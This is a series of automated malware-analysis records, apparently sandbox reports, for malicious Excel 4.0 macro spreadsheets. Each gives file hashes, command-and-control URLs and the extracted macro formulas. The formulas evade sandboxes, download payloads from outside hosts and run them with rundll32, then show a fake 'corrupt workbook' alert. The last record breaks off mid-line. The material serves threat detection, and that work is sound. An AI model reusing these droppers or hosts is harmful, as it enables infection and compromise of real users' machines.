{"version":"0.2","sample":{"sample":"","kind":"file","target":"68b3d8dadf27947964a1e1c2e4363231ae662e3499a974c67272e6d4e2bdd5d5"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68b3d8dadf27947964a1e1c2e4363231ae662e3499a974c67272e6d4e2bdd5d5","filesize":112640,"md5":"663f4d78ea9b40ad252c082819a3701c","sha1":"8893e7db1e75cec41aa10c6bac5291e2e97c30cb","sha256":"68b3d8dadf27947964a1e1c2e4363231ae662e3499a974c67272e6d4e2bdd5d5","sha512":"05ab20042ce9dd8c4a84ebecab064aada5ceb18e8299aeddde4cf57805c5722551f3f4f4b1b7ce9ffbfefb076d17a2b52855b998ac5b38b7073f943119fe324f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68b3d8dadf27947964a1e1c2e4363231ae662e3499a974c67272e6d4e2bdd5d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68b44634dcb716725fb2e7db398c64179bcdc02ce30cc8ed8a316c27e1a89de9"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68b44634dcb716725fb2e7db398c64179bcdc02ce30cc8ed8a316c27e1a89de9","filesize":167936,"md5":"455ac3f5f6d357fbf07f7157017d917f","sha1":"744450845ad4732a68e6f322aa9bc801806be9a1","sha256":"68b44634dcb716725fb2e7db398c64179bcdc02ce30cc8ed8a316c27e1a89de9","sha512":"e859c5620adde6587b14c1de5c3e9c2fe1dc9e05f10dd1becf9a413f301deb4fb94f98af69f91ab9ec1f303608524fe61dbf98dab660e3fb983a782689f4b779","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68b44634dcb716725fb2e7db398c64179bcdc02ce30cc8ed8a316c27e1a89de9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"91UxXnykJA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68b55652f86b16cc6710c5bf917dbd78bd2dcbeeeab0768f3b5858bc3bec8627"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68b55652f86b16cc6710c5bf917dbd78bd2dcbeeeab0768f3b5858bc3bec8627","filesize":160768,"md5":"6fecaf9384fe9581123db9807022e691","sha1":"18030777379a6a00d9959c980708d6e2f5c3a006","sha256":"68b55652f86b16cc6710c5bf917dbd78bd2dcbeeeab0768f3b5858bc3bec8627","sha512":"1b6b2c5267a6a7183ac69317ab3a3701b362150a70db1d356491da8b4766b5773e84a1ed057888dfec7f72b7ad1841271ff74a8ea509979771c10b15bd426051","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68b55652f86b16cc6710c5bf917dbd78bd2dcbeeeab0768f3b5858bc3bec8627.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oFZfgEay6X\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68ce17299ed270364adc2a284acd5a31858634097a6f52e5dcf8f018f0511027"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68ce17299ed270364adc2a284acd5a31858634097a6f52e5dcf8f018f0511027","filesize":109568,"md5":"9b819fac331b6ebcecc9a79183cdacd8","sha1":"3f9f129223d3bbeb4beff92e9f9c0adb6e4f0665","sha256":"68ce17299ed270364adc2a284acd5a31858634097a6f52e5dcf8f018f0511027","sha512":"6beaa650fd1c87aa2c8401c9a5b5810203dac302a73bf1cee677bb35507daae0c7b57be8a08761bfc4a0713966815cc9ddbcffe3cbfd2a4433db177a3702641c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68ce17299ed270364adc2a284acd5a31858634097a6f52e5dcf8f018f0511027.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"SIFloqpN1C\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68d45847c35bd014a512bf954c05ffd7cb3121a567d839487e0157d32b009ecf"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68d45847c35bd014a512bf954c05ffd7cb3121a567d839487e0157d32b009ecf","filesize":209920,"md5":"d83482d6eb5e4b4a9e816b4c80093365","sha1":"e70cf25ab9144bbf420e4641f35fdbd8a482f954","sha256":"68d45847c35bd014a512bf954c05ffd7cb3121a567d839487e0157d32b009ecf","sha512":"1b64a2c33ce69e3582c33c71f88b20eed7140eaa67aaedef07c81a835ca3c36f13a95f475ca72572072456b39cfa753c893aba41a306dfea4c9f8ad9d10ce843","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68d45847c35bd014a512bf954c05ffd7cb3121a567d839487e0157d32b009ecf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pCtRVIE2qb\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68d62008eaec5f235a6afbcaa655a4dc185de1d49c0bced7100046ec925fdbd9"},"analysis":{"reported":"2020-04-09T16:16:49Z","score":10},"files":[{"filename":"68d62008eaec5f235a6afbcaa655a4dc185de1d49c0bced7100046ec925fdbd9","filesize":168960,"md5":"d2491fd468d018153ac52624e7226cfa","sha1":"2cc71ab41def5eb5f77e7da7eb9821500a557a92","sha256":"68d62008eaec5f235a6afbcaa655a4dc185de1d49c0bced7100046ec925fdbd9","sha512":"cc786ea171c6a82f4fa5c81431fc44d6a3dd9c6544d84bd35c1e1a2942f31b95d8a0da2784f4d1ac8900a7dfa29698bafb5c744140f5f2d411bfa0c8cd63d3b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68d62008eaec5f235a6afbcaa655a4dc185de1d49c0bced7100046ec925fdbd9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ckJ3qGVcL1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68eeb45ff70d52425e6dac8a4c893006e4bb3ae5487c46852fe4d1ac7c54928a"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"68eeb45ff70d52425e6dac8a4c893006e4bb3ae5487c46852fe4d1ac7c54928a","filesize":207360,"md5":"e68121deac933ed4790b3bb08ac27a9c","sha1":"12385eb0127c48d84b1ba15d1d5871fa33618faa","sha256":"68eeb45ff70d52425e6dac8a4c893006e4bb3ae5487c46852fe4d1ac7c54928a","sha512":"3393c08d13e0cd7bc9f417fe40e71946e3b5724e6ef068aa434881ccc9c1b29f12f1b31e7fce4064960214b12c130f7e91f20eee56b4b360bad76e2fa007995f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68eeb45ff70d52425e6dac8a4c893006e4bb3ae5487c46852fe4d1ac7c54928a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cDes43o5iR\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6904bc02e567e86b765358962f1f7e6ae699e8809271b974af0d2885c7bd083d"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"6904bc02e567e86b765358962f1f7e6ae699e8809271b974af0d2885c7bd083d","filesize":209920,"md5":"55aee9484ea4446cb3aa19bd9dd25e3b","sha1":"d0bd6a3fb4dad32114297ca9f5c56eb0ad50261c","sha256":"6904bc02e567e86b765358962f1f7e6ae699e8809271b974af0d2885c7bd083d","sha512":"c03b9b3407bba43ecfce05f2ec7573d60272bf58238c5ac587a0501c90c2056f0176a48df590036653d368bf0a8e2e6179532d64601847ddf94c04cf28329c29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6904bc02e567e86b765358962f1f7e6ae699e8809271b974af0d2885c7bd083d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2dMjW79l33\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"690e64c490486f315c4f1ee4b826d68042c329c3f2ebe199c76211d68047ca72"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"690e64c490486f315c4f1ee4b826d68042c329c3f2ebe199c76211d68047ca72","filesize":177152,"md5":"9600cb88084821745726ce36756e584e","sha1":"eb7e0beb8cc59c69d56c3b57ab09b477cf9af51a","sha256":"690e64c490486f315c4f1ee4b826d68042c329c3f2ebe199c76211d68047ca72","sha512":"b0d4c58a3fb69bc332e7f09337d5f5d9e61d50420e3c140423d777158567c7692c760b3bea29e998657b36de60a0fb92c5086fcd8e7007cad1be3bc400fb43b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"690e64c490486f315c4f1ee4b826d68042c329c3f2ebe199c76211d68047ca72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nvnE61058b\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6916fd701f883f11680fe3e3bd1d55636ac35a73fe50ce439fa19d18d0326439"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"6916fd701f883f11680fe3e3bd1d55636ac35a73fe50ce439fa19d18d0326439","filesize":212992,"md5":"48c3955e93acb127818151855560cce8","sha1":"e53b3c72b51b122997c317fde33464856e301279","sha256":"6916fd701f883f11680fe3e3bd1d55636ac35a73fe50ce439fa19d18d0326439","sha512":"abeb8d9a95510135bfa31eab7828b81046498514b388531adaf39a7bd9b6564f3fb9371f4b71123b443df7266b4bb9fa7aab61a827b7fe83ff9e66feb3ebb08a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6916fd701f883f11680fe3e3bd1d55636ac35a73fe50ce439fa19d18d0326439.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LeYdcf4ZJY\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"691edefe1e0739d4a8090416c97afc7ccb19ac624d62064e631916662879cb22"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"691edefe1e0739d4a8090416c97afc7ccb19ac624d62064e631916662879cb22","filesize":112640,"md5":"513774add5a2fac47b0b1cca4bff571b","sha1":"cd2a459ab1840a7727978cf5dd7da538f718517c","sha256":"691edefe1e0739d4a8090416c97afc7ccb19ac624d62064e631916662879cb22","sha512":"2d5c7475f34bb7c1c31b826157ffbeaac116f01821a32e424e51c5600c1322091201b3fc10fdeabc20cf96c4da74c75687f110bd4a70266fea66af7968dfa24d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"691edefe1e0739d4a8090416c97afc7ccb19ac624d62064e631916662879cb22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"692977f14c62d9b0b62f6c53bf55941c818fa615cc90f42c60b5ef25fc11bf4f"},"analysis":{"reported":"2020-04-09T16:16:50Z","score":10},"files":[{"filename":"692977f14c62d9b0b62f6c53bf55941c818fa615cc90f42c60b5ef25fc11bf4f","filesize":113664,"md5":"178eac54a021bcc58dcca9145aaa9104","sha1":"4d83fbc158740cdc88b490e01f8b46a3c1b5ab3e","sha256":"692977f14c62d9b0b62f6c53bf55941c818fa615cc90f42c60b5ef25fc11bf4f","sha512":"a822c836c256fe29d267720fae6665cf1879f39461e4706056a2d4f227c93ab71521bbe218e5281f0fe744b0d0fa1dc5e699ac253d18d3c505db2386ec2ff0bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"692977f14c62d9b0b62f6c53bf55941c818fa615cc90f42c60b5ef25fc11bf4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"3ef3AsUBGK\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"697a92b294b5e15915a75de745185f9cafac1f027b52b9e8ad151ae5e66cbf26"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"697a92b294b5e15915a75de745185f9cafac1f027b52b9e8ad151ae5e66cbf26","filesize":206336,"md5":"bd4295bd5a056916928bad44644f636e","sha1":"9c8d594f98f58f6c24de55cd053c3db9d864ec33","sha256":"697a92b294b5e15915a75de745185f9cafac1f027b52b9e8ad151ae5e66cbf26","sha512":"998d635e39687636b5c45e3f8b3a8e81e237467060bc23b1f0d54d3eb05b9bab90d4a5730f618ecf5dd916b98fab522c5c414ea43af789032a34d3f3ee56a0e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"697a92b294b5e15915a75de745185f9cafac1f027b52b9e8ad151ae5e66cbf26.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fHlIPCRo1f\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"697beb1645b13fcdb27e1de67e07281484944a1c0ef09ad8e683220c10114eac"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"697beb1645b13fcdb27e1de67e07281484944a1c0ef09ad8e683220c10114eac","filesize":171008,"md5":"5a080e000eec86f2b5da17cce58d9fd8","sha1":"2293851b1f764d0792af89e7ab8b426967e3c7aa","sha256":"697beb1645b13fcdb27e1de67e07281484944a1c0ef09ad8e683220c10114eac","sha512":"2349e18ae0ee35aafcb762cbd9bad86cb0c8f394aaa3d603a73fa6ef13864a9e6f55d6e4c781c902d2cdea0fe00f652be977cbf3a4737154795673c0e341406f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"697beb1645b13fcdb27e1de67e07281484944a1c0ef09ad8e683220c10114eac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 